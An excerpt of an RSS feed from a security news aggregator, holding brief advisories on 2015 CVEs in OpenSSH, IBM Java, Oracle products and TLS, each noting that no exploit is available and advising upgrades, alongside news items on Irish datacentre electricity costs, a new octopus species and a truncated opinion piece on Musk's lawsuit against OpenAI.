<description><![CDATA[Growing fleet of datacentres last year used 22% of the country’s electricityEnergy demand by datacentres in Ireland has added hundreds of euros to household electricity bills in a pattern that could be replicated across Europe, according to a new report.The centres have “drained” €715m (£620m) fr...]]></description>
<link>https://tsecurity.de/de/3554239/ai-nachrichten/irish-datacentres-have-increased-household-bills-by-hundreds-of-euros-report-finds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554239/ai-nachrichten/irish-datacentres-have-increased-household-bills-by-hundreds-of-euros-report-finds/</guid>
<pubDate>Thu, 28 May 2026 15:03:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Growing fleet of datacentres last year used 22% of the country’s electricity</p><p>Energy demand by datacentres in Ireland has added hundreds of euros to household electricity bills in a pattern that could be replicated across Europe, according to a new report.</p><p>The centres have “drained” €715m (£620m) from the Irish economy and increased household bills by a cumulative average of €360 between 2015 and 2023, said the report commissioned by Friends of the Earth Ireland and Beyond Fossil Fuels.</p> <a href="https://www.theguardian.com/technology/2026/may/28/irish-datacentres-household-bills-electricity">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-6564 | OpenSSH up to 6.x on Non-OpenBSD monitor.c mm_answer_pam_free_ctx MONITOR_REQ_PAM_FREE_CTX Request access control (Nessus ID 86656 / ID 236003)]]></title>
<description><![CDATA[A vulnerability was found in OpenSSH up to 6.x on Non-OpenBSD and classified as problematic. Affected by this vulnerability is the function mm_answer_pam_free_ctx of the file monitor.c. Such manipulation as part of MONITOR_REQ_PAM_FREE_CTX Request leads to improper access controls.

This vulnerab...]]></description>
<link>https://tsecurity.de/de/3552821/sicherheitsluecken/cve-2015-6564-openssh-up-to-6x-on-non-openbsd-monitorc-mmanswerpamfreectx-monitorreqpamfreectx-request-access-control-nessus-id-86656-id-236003/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552821/sicherheitsluecken/cve-2015-6564-openssh-up-to-6x-on-non-openbsd-monitorc-mmanswerpamfreectx-monitorreqpamfreectx-request-access-control-nessus-id-86656-id-236003/</guid>
<pubDate>Thu, 28 May 2026 04:21:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/openssh">OpenSSH up to 6.x</a> on Non-OpenBSD and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this vulnerability is the function <code>mm_answer_pam_free_ctx</code> of the file <em>monitor.c</em>. Such manipulation as part of <em>MONITOR_REQ_PAM_FREE_CTX Request</em> leads to improper access controls.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2015-6564">CVE-2015-6564</a>. The attack needs to be performed locally. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-1916 | IBM Java 8 SSL/TLS denial of service (Nessus ID 84087 / ID 123567)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in IBM Java 8. This vulnerability affects unknown code of the component SSL/TLS Handler. This manipulation causes denial of service.

This vulnerability is registered as CVE-2015-1916. Remote exploitation of the attack is possible. No exploi...]]></description>
<link>https://tsecurity.de/de/3552630/sicherheitsluecken/cve-2015-1916-ibm-java-8-ssltls-denial-of-service-nessus-id-84087-id-123567/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552630/sicherheitsluecken/cve-2015-1916-ibm-java-8-ssltls-denial-of-service-nessus-id-84087-id-123567/</guid>
<pubDate>Thu, 28 May 2026 01:23:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/ibm:java">IBM Java 8</a>. This vulnerability affects unknown code of the component <em>SSL/TLS Handler</em>. This manipulation causes denial of service.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2015-1916">CVE-2015-1916</a>. Remote exploitation of the attack is possible. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-6563 | OpenSSH up to 6.x on Non-OpenBSD sshd monitor.c MONITOR_REQ_PAM_INIT_CTX Request input validation (Nessus ID 86656 / ID 236003)]]></title>
<description><![CDATA[A vulnerability has been found in OpenSSH up to 6.x on Non-OpenBSD and classified as problematic. Affected is an unknown function of the file monitor.c of the component sshd. This manipulation as part of MONITOR_REQ_PAM_INIT_CTX Request causes improper input validation.

This vulnerability is reg...]]></description>
<link>https://tsecurity.de/de/3552629/sicherheitsluecken/cve-2015-6563-openssh-up-to-6x-on-non-openbsd-sshd-monitorc-monitorreqpaminitctx-request-input-validation-nessus-id-86656-id-236003/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552629/sicherheitsluecken/cve-2015-6563-openssh-up-to-6x-on-non-openbsd-sshd-monitorc-monitorreqpaminitctx-request-input-validation-nessus-id-86656-id-236003/</guid>
<pubDate>Thu, 28 May 2026 01:23:13 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/openssh">OpenSSH up to 6.x</a> on Non-OpenBSD and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected is an unknown function of the file <em>monitor.c</em> of the component <em>sshd</em>. This manipulation as part of <em>MONITOR_REQ_PAM_INIT_CTX Request</em> causes improper input validation.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2015-6563">CVE-2015-6563</a>. The attack needs to be launched locally. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5600 | OpenSSH up to 6.9 auth2-chall.c kbdint_next_device access control (HT20503 / Nessus ID 85278)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in OpenSSH up to 6.9. Affected by this issue is the function kbdint_next_device of the file auth2-chall.c. Performing a manipulation results in improper access controls.

This vulnerability is cataloged as CVE-2015-5600. It is possible t...]]></description>
<link>https://tsecurity.de/de/3552628/sicherheitsluecken/cve-2015-5600-openssh-up-to-69-auth2-challc-kbdintnextdevice-access-control-ht20503-nessus-id-85278/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552628/sicherheitsluecken/cve-2015-5600-openssh-up-to-69-auth2-challc-kbdintnextdevice-access-control-ht20503-nessus-id-85278/</guid>
<pubDate>Thu, 28 May 2026 01:23:12 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/openssh">OpenSSH up to 6.9</a>. Affected by this issue is the function <code>kbdint_next_device</code> of the file <em>auth2-chall.c</em>. Performing a manipulation results in improper access controls.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2015-5600">CVE-2015-5600</a>. It is possible to initiate the attack remotely. There is no exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-6563 | Apple Mac OS X up to 10.11.0 OpenSSH input validation (HT205375 / Nessus ID 86656)]]></title>
<description><![CDATA[A vulnerability was found in Apple Mac OS X up to 10.11.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the component OpenSSH. The manipulation leads to improper input validation.

This vulnerability is uniquely identified as CVE-2015-6563. Local acces...]]></description>
<link>https://tsecurity.de/de/3552627/sicherheitsluecken/cve-2015-6563-apple-mac-os-x-up-to-10110-openssh-input-validation-ht205375-nessus-id-86656/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552627/sicherheitsluecken/cve-2015-6563-apple-mac-os-x-up-to-10110-openssh-input-validation-ht205375-nessus-id-86656/</guid>
<pubDate>Thu, 28 May 2026 01:23:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:mac_os_x">Apple Mac OS X up to 10.11.0</a>. It has been rated as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected by this issue is some unknown functionality of the component <em>OpenSSH</em>. The manipulation leads to improper input validation.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2015-6563">CVE-2015-6563</a>. Local access is required to approach this attack. No exploit exists.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-4000 | Oracle Secure Global Desktop 4.63/4.71/5.2 OpenSSL cryptographic issue (Nessus ID 87764 / ID 350152)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Oracle Secure Global Desktop 4.63/4.71/5.2. Impacted is an unknown function of the component OpenSSL. The manipulation results in cryptographic issues.

This vulnerability is known as CVE-2015-4000. Attacking locally is a requirement. No ex...]]></description>
<link>https://tsecurity.de/de/3552626/sicherheitsluecken/cve-2015-4000-oracle-secure-global-desktop-46347152-openssl-cryptographic-issue-nessus-id-87764-id-350152/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552626/sicherheitsluecken/cve-2015-4000-oracle-secure-global-desktop-46347152-openssl-cryptographic-issue-nessus-id-87764-id-350152/</guid>
<pubDate>Thu, 28 May 2026 01:23:09 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/oracle:secure_global_desktop">Oracle Secure Global Desktop 4.63/4.71/5.2</a>. Impacted is an unknown function of the component <em>OpenSSL</em>. The manipulation results in cryptographic issues.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2015-4000">CVE-2015-4000</a>. Attacking locally is a requirement. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-4000 | Oracle Fujitsu M10-1/M10-4/M10-4S Servers up to XCP 2270 XCP Firmware cryptographic issue (Nessus ID 85301 / ID 350152)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Oracle Fujitsu M10-1, M10-4 and M10-4S Servers up to XCP 2270. The affected element is an unknown function of the component XCP Firmware. This manipulation causes cryptographic issues.

This vulnerability is tracked as CVE-2015-...]]></description>
<link>https://tsecurity.de/de/3552625/sicherheitsluecken/cve-2015-4000-oracle-fujitsu-m10-1m10-4m10-4s-servers-up-to-xcp-2270-xcp-firmware-cryptographic-issue-nessus-id-85301-id-350152/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552625/sicherheitsluecken/cve-2015-4000-oracle-fujitsu-m10-1m10-4m10-4s-servers-up-to-xcp-2270-xcp-firmware-cryptographic-issue-nessus-id-85301-id-350152/</guid>
<pubDate>Thu, 28 May 2026 01:23:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/oracle:fujitsu_m10-1">Oracle Fujitsu M10-1, M10-4 and M10-4S Servers up to XCP 2270</a>. The affected element is an unknown function of the component <em>XCP Firmware</em>. This manipulation causes cryptographic issues.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2015-4000">CVE-2015-4000</a>. The attack is possible to be carried out remotely. No exploit exists.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5600 | Oracle ILOM 3.0/3.1/3.2 access control (Nessus ID 87351 / ID 350077)]]></title>
<description><![CDATA[A vulnerability was found in Oracle ILOM 3.0/3.1/3.2. It has been rated as very critical. This issue affects some unknown processing. The manipulation leads to improper access controls.

This vulnerability is listed as CVE-2015-5600. The attack may be initiated remotely. There is no available exp...]]></description>
<link>https://tsecurity.de/de/3552624/sicherheitsluecken/cve-2015-5600-oracle-ilom-303132-access-control-nessus-id-87351-id-350077/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552624/sicherheitsluecken/cve-2015-5600-oracle-ilom-303132-access-control-nessus-id-87351-id-350077/</guid>
<pubDate>Thu, 28 May 2026 01:23:07 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:ilom">Oracle ILOM 3.0/3.1/3.2</a>. It has been rated as <a href="https://vuldb.com/kb/risk">very critical</a>. This issue affects some unknown processing. The manipulation leads to improper access controls.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2015-5600">CVE-2015-5600</a>. The attack may be initiated remotely. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-4000 | Oracle SPARC Enterprise Server XCP Firmware cryptographic issue (Nessus ID 85301 / ID 350152)]]></title>
<description><![CDATA[A vulnerability was found in Oracle SPARC Enterprise Server and classified as problematic. This impacts an unknown function of the component XCP Firmware. The manipulation results in cryptographic issues.

This vulnerability is cataloged as CVE-2015-4000. The attack may be launched remotely. Ther...]]></description>
<link>https://tsecurity.de/de/3552623/sicherheitsluecken/cve-2015-4000-oracle-sparc-enterprise-server-xcp-firmware-cryptographic-issue-nessus-id-85301-id-350152/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552623/sicherheitsluecken/cve-2015-4000-oracle-sparc-enterprise-server-xcp-firmware-cryptographic-issue-nessus-id-85301-id-350152/</guid>
<pubDate>Thu, 28 May 2026 01:23:06 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:sparc_enterprise_server">Oracle SPARC Enterprise Server</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. This impacts an unknown function of the component <em>XCP Firmware</em>. The manipulation results in cryptographic issues.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2015-4000">CVE-2015-4000</a>. The attack may be launched remotely. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-4000 | Oracle Enterprise Manager Ops Center 12.4.0.0 User Interface cryptographic issue (Nessus ID 84405 / ID 124568)]]></title>
<description><![CDATA[A vulnerability described as problematic has been identified in Oracle Enterprise Manager Ops Center 12.4.0.0. Affected is an unknown function of the component User Interface. The manipulation results in cryptographic issues.

This vulnerability is reported as CVE-2015-4000. The attack can be lau...]]></description>
<link>https://tsecurity.de/de/3552622/sicherheitsluecken/cve-2015-4000-oracle-enterprise-manager-ops-center-12400-user-interface-cryptographic-issue-nessus-id-84405-id-124568/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552622/sicherheitsluecken/cve-2015-4000-oracle-enterprise-manager-ops-center-12400-user-interface-cryptographic-issue-nessus-id-84405-id-124568/</guid>
<pubDate>Thu, 28 May 2026 01:23:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability described as <a href="https://vuldb.com/kb/risk">problematic</a> has been identified in <a href="https://vuldb.com/product/oracle:enterprise_manager_ops_center">Oracle Enterprise Manager Ops Center 12.4.0.0</a>. Affected is an unknown function of the component <em>User Interface</em>. The manipulation results in cryptographic issues.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2015-4000">CVE-2015-4000</a>. The attack can be launched remotely. No exploit exists.

Upgrading the affected component is recommended.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-5600 | Oracle Communications 12.x Policy Management access control (Nessus ID 85033 / ID 350077)]]></title>
<description><![CDATA[A vulnerability was found in Oracle Communications 12.x. It has been declared as critical. Affected is an unknown function of the component Policy Management. Executing a manipulation can lead to improper access controls.

This vulnerability is tracked as CVE-2015-5600. The attack can be launched...]]></description>
<link>https://tsecurity.de/de/3552621/sicherheitsluecken/cve-2015-5600-oracle-communications-12x-policy-management-access-control-nessus-id-85033-id-350077/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552621/sicherheitsluecken/cve-2015-5600-oracle-communications-12x-policy-management-access-control-nessus-id-85033-id-350077/</guid>
<pubDate>Thu, 28 May 2026 01:23:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/oracle:communications">Oracle Communications 12.x</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. Affected is an unknown function of the component <em>Policy Management</em>. Executing a manipulation can lead to improper access controls.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2015-5600">CVE-2015-5600</a>. The attack can be launched remotely. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-0192 | IBM Java 6/7/8 Virtual Machine privileges management (RHSA-2015:1006 / Nessus ID 84087)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in IBM Java 6/7/8. Affected by this issue is some unknown functionality of the component Virtual Machine. The manipulation leads to improper privilege management.

This vulnerability is listed as CVE-2015-0192. The attack may be initiated r...]]></description>
<link>https://tsecurity.de/de/3552620/sicherheitsluecken/cve-2015-0192-ibm-java-678-virtual-machine-privileges-management-rhsa-20151006-nessus-id-84087/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552620/sicherheitsluecken/cve-2015-0192-ibm-java-678-virtual-machine-privileges-management-rhsa-20151006-nessus-id-84087/</guid>
<pubDate>Thu, 28 May 2026 01:23:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/ibm:java">IBM Java 6/7/8</a>. Affected by this issue is some unknown functionality of the component <em>Virtual Machine</em>. The manipulation leads to improper privilege management.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2015-0192">CVE-2015-0192</a>. The attack may be initiated remotely. There is no available exploit.

Applying a patch is the recommended action to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-2808 | Oracle HTTP Server up to 12.2.1.2.0 Web Listener cryptographic issue (Nessus ID 83135 / ID 91499)]]></title>
<description><![CDATA[A vulnerability labeled as problematic has been found in Oracle HTTP Server 11.1.1.7.0/11.1.1.9.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0. This issue affects some unknown processing of the component Web Listener. The manipulation results in cryptographic issues.

This vulnerability is known as CVE-2015-...]]></description>
<link>https://tsecurity.de/de/3552400/sicherheitsluecken/cve-2015-2808-oracle-http-server-up-to-122120-web-listener-cryptographic-issue-nessus-id-83135-id-91499/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552400/sicherheitsluecken/cve-2015-2808-oracle-http-server-up-to-122120-web-listener-cryptographic-issue-nessus-id-83135-id-91499/</guid>
<pubDate>Wed, 27 May 2026 22:53:40 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/oracle:http_server">Oracle HTTP Server 11.1.1.7.0/11.1.1.9.0/12.1.3.0.0/12.2.1.1.0/12.2.1.2.0</a>. This issue affects some unknown processing of the component <em>Web Listener</em>. The manipulation results in cryptographic issues.

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2015-2808">CVE-2015-2808</a>. It is possible to launch the attack remotely. No exploit is available.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-2808 | TLS Protocol/SSL Protocol RC4 Encryption Bar Mitzvah Attack cryptographic issue (Nessus ID 83135 / ID 91499)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in TLS Protocol and SSL Protocol. This vulnerability affects unknown code of the component RC4 Encryption. Such manipulation leads to cryptographic issues  (Bar Mitzvah Attack).

This vulnerability is uniquely identified as CVE-2015-...]]></description>
<link>https://tsecurity.de/de/3552394/sicherheitsluecken/cve-2015-2808-tls-protocolssl-protocol-rc4-encryption-bar-mitzvah-attack-cryptographic-issue-nessus-id-83135-id-91499/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552394/sicherheitsluecken/cve-2015-2808-tls-protocolssl-protocol-rc4-encryption-bar-mitzvah-attack-cryptographic-issue-nessus-id-83135-id-91499/</guid>
<pubDate>Wed, 27 May 2026 22:53:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/tls_protocol">TLS Protocol and SSL Protocol</a>. This vulnerability affects unknown code of the component <em>RC4 Encryption</em>. Such manipulation leads to cryptographic issues  (Bar Mitzvah Attack).

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2015-2808">CVE-2015-2808</a>. The attack can be launched remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-4000 | Oracle Communications Messaging Server 7.0.5/8.0 cryptographic issue (Nessus ID 90150 / ID 350152)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Oracle Communications Messaging Server 7.0.5/8.0. This impacts an unknown function. Such manipulation leads to cryptographic issues.

This vulnerability is documented as CVE-2015-4000. The attack can be executed remotely. There is no...]]></description>
<link>https://tsecurity.de/de/3552393/sicherheitsluecken/cve-2015-4000-oracle-communications-messaging-server-70580-cryptographic-issue-nessus-id-90150-id-350152/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552393/sicherheitsluecken/cve-2015-4000-oracle-communications-messaging-server-70580-cryptographic-issue-nessus-id-90150-id-350152/</guid>
<pubDate>Wed, 27 May 2026 22:53:31 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/oracle:communications_messaging_server">Oracle Communications Messaging Server 7.0.5/8.0</a>. This impacts an unknown function. Such manipulation leads to cryptographic issues.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2015-4000">CVE-2015-4000</a>. The attack can be executed remotely. There is not any exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-4000 | TLS Protocol up to 1.2 DHE_EXPORT Ciphersuite Logjam cryptographic issue (Nessus ID 83937 / ID 350152)]]></title>
<description><![CDATA[A vulnerability was found in TLS Protocol up to 1.2. It has been rated as very critical. This affects an unknown part of the component DHE_EXPORT Ciphersuite. Performing a manipulation results in cryptographic issues  (Logjam).

This vulnerability is known as CVE-2015-4000. Remote exploitation of...]]></description>
<link>https://tsecurity.de/de/3552392/sicherheitsluecken/cve-2015-4000-tls-protocol-up-to-12-dheexport-ciphersuite-logjam-cryptographic-issue-nessus-id-83937-id-350152/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552392/sicherheitsluecken/cve-2015-4000-tls-protocol-up-to-12-dheexport-ciphersuite-logjam-cryptographic-issue-nessus-id-83937-id-350152/</guid>
<pubDate>Wed, 27 May 2026 22:53:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/tls_protocol">TLS Protocol up to 1.2</a>. It has been rated as <a href="https://vuldb.com/kb/risk">very critical</a>. This affects an unknown part of the component <em>DHE_EXPORT Ciphersuite</em>. Performing a manipulation results in cryptographic issues  (Logjam).

This vulnerability is known as <a href="https://vuldb.com/cve/CVE-2015-4000">CVE-2015-4000</a>. Remote exploitation of the attack is possible. No exploit is available. Due to its background and reception, this vulnerability has an historic impact.

It is recommended to change the configuration settings.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-2808 | Oracle SPARC Enterprise M Server cryptographic issue (Nessus ID 83135 / ID 91499)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Oracle SPARC Enterprise M Server. Impacted is an unknown function. Executing a manipulation can lead to cryptographic issues.

This vulnerability is handled as CVE-2015-2808. The attack can be executed remotely. There is not any expl...]]></description>
<link>https://tsecurity.de/de/3552391/sicherheitsluecken/cve-2015-2808-oracle-sparc-enterprise-m-server-cryptographic-issue-nessus-id-83135-id-91499/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552391/sicherheitsluecken/cve-2015-2808-oracle-sparc-enterprise-m-server-cryptographic-issue-nessus-id-83135-id-91499/</guid>
<pubDate>Wed, 27 May 2026 22:53:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/oracle:sparc_enterprise_m_server">Oracle SPARC Enterprise M Server</a>. Impacted is an unknown function. Executing a manipulation can lead to cryptographic issues.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2015-2808">CVE-2015-2808</a>. The attack can be executed remotely. There is not any exploit available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-2808 | Oracle Communications Policy Management up to 9.9.1 Security cryptographic issue (Nessus ID 83135 / ID 91499)]]></title>
<description><![CDATA[A vulnerability classified as problematic was found in Oracle Communications Policy Management up to 9.9.1. This issue affects some unknown processing of the component Security. The manipulation results in cryptographic issues.

This vulnerability is identified as CVE-2015-2808. The attack can be...]]></description>
<link>https://tsecurity.de/de/3552390/sicherheitsluecken/cve-2015-2808-oracle-communications-policy-management-up-to-991-security-cryptographic-issue-nessus-id-83135-id-91499/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552390/sicherheitsluecken/cve-2015-2808-oracle-communications-policy-management-up-to-991-security-cryptographic-issue-nessus-id-83135-id-91499/</guid>
<pubDate>Wed, 27 May 2026 22:53:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> was found in <a href="https://vuldb.com/product/oracle:communications_policy_management">Oracle Communications Policy Management up to 9.9.1</a>. This issue affects some unknown processing of the component <em>Security</em>. The manipulation results in cryptographic issues.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2015-2808">CVE-2015-2808</a>. The attack can be executed remotely. There is not any exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[A New Species of Tiny Octopus Was Discovered in the Galápagos Islands]]></title>
<description><![CDATA[An octopus about the size of a golf ball was first spotted in 2015 near Darwin Island. A new study gives it both a formal description and a name.]]></description>
<link>https://tsecurity.de/de/3550566/it-nachrichten/a-new-species-of-tiny-octopus-was-discovered-in-the-galpagos-islands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550566/it-nachrichten/a-new-species-of-tiny-octopus-was-discovered-in-the-galpagos-islands/</guid>
<pubDate>Wed, 27 May 2026 11:48:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An octopus about the size of a golf ball was first spotted in 2015 near Darwin Island. A new study gives it both a formal description and a name.]]></content:encoded>
</item>
<item>
<title><![CDATA[The big winner in Elon Musk’s suit against OpenAI and Microsoft — hypocrisy]]></title>
<description><![CDATA[If ever there were a lawsuit in which a jury and judge should have ruled against both the accuser and the defendants, Elon Musk’s suit against OpenAI and Microsoft was it. 



The high-profile legal battle pitted the world’s richest man against a company worth more than $3 trillion, another that ...]]></description>
<link>https://tsecurity.de/de/3550142/it-nachrichten/the-big-winner-in-elon-musks-suit-against-openai-and-microsoft-hypocrisy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550142/it-nachrichten/the-big-winner-in-elon-musks-suit-against-openai-and-microsoft-hypocrisy/</guid>
<pubDate>Wed, 27 May 2026 09:17:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>If ever there were a lawsuit in which a jury and judge should have ruled against both the accuser <em>and</em> the defendants, <a href="https://regmedia.co.uk/2024/08/05/musk_v_openai.pdf" target="_blank" rel="noreferrer noopener">Elon Musk’s suit against OpenAI and Microsoft</a> was it. </p>



<p>The high-profile legal battle pitted the world’s richest man against a company worth more than $3 trillion, another that might soon launch a $1 trillion IPO, and tech execs claiming to have only the good of the world in mind, not mere filthy lucre, while they develop a technology some fear could eventually destroy humankind.</p>



<p>The lawsuit was eventually thrown out, but only on technical grounds. Meanwhile, unregulated AI marches on, with Musk, OpenAI and Microsoft all getting richer.</p>



<p>The only winner in this suit was hypocrisy. Here’s why.</p>



<h2 class="wp-block-heading">Back to the beginning</h2>



<p>To understand how this unfolded, we need to go back to OpenAI’s beginnings. The company was founded by current CEO Sam Altman, Musk and others in 2015 — back when AI was a niche technology, used primarily for image and speech recognition, robotics, and experiments in self-driving cars.</p>



